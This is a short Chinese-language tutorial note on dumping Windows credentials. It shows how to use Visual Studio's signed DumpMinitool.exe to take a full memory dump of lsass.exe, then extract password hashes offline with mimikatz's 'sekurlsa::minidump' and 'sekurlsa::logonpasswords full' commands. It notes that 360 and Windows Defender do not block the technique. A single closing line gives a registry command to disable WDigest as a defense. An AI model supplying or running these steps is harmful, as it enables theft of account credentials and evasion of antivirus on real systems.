内存dump工具学习

可以自行安装Visual Studio2022，然后访问路径，把工具拖出来使用即可

目录位置

C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTestPlatformExtensions

文件名：DumpMinitool.exe

使用命令：

DumpMinitool.exe --file dump.txt --processId xxx --dumpType Full
--file 输出的路径
--processId lsass.exe进程的ID
--dumpType 方式

查看lsass进程ID

dump完成后，再使用mimikatz进行离线解密即可

将lsass.dmp放置在mimikatz目录中，通过加载到mimikatz

sekurlsa::minidump lsass.dmp

导出密码散列值

sekurlsa::logonpasswords full

切记需要用管理员权限运行

免杀测试：360和Win10自带的defender杀软均不拦截。

沙箱检测：

防范

关闭wdigest，无法从内存中获得明文密码

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f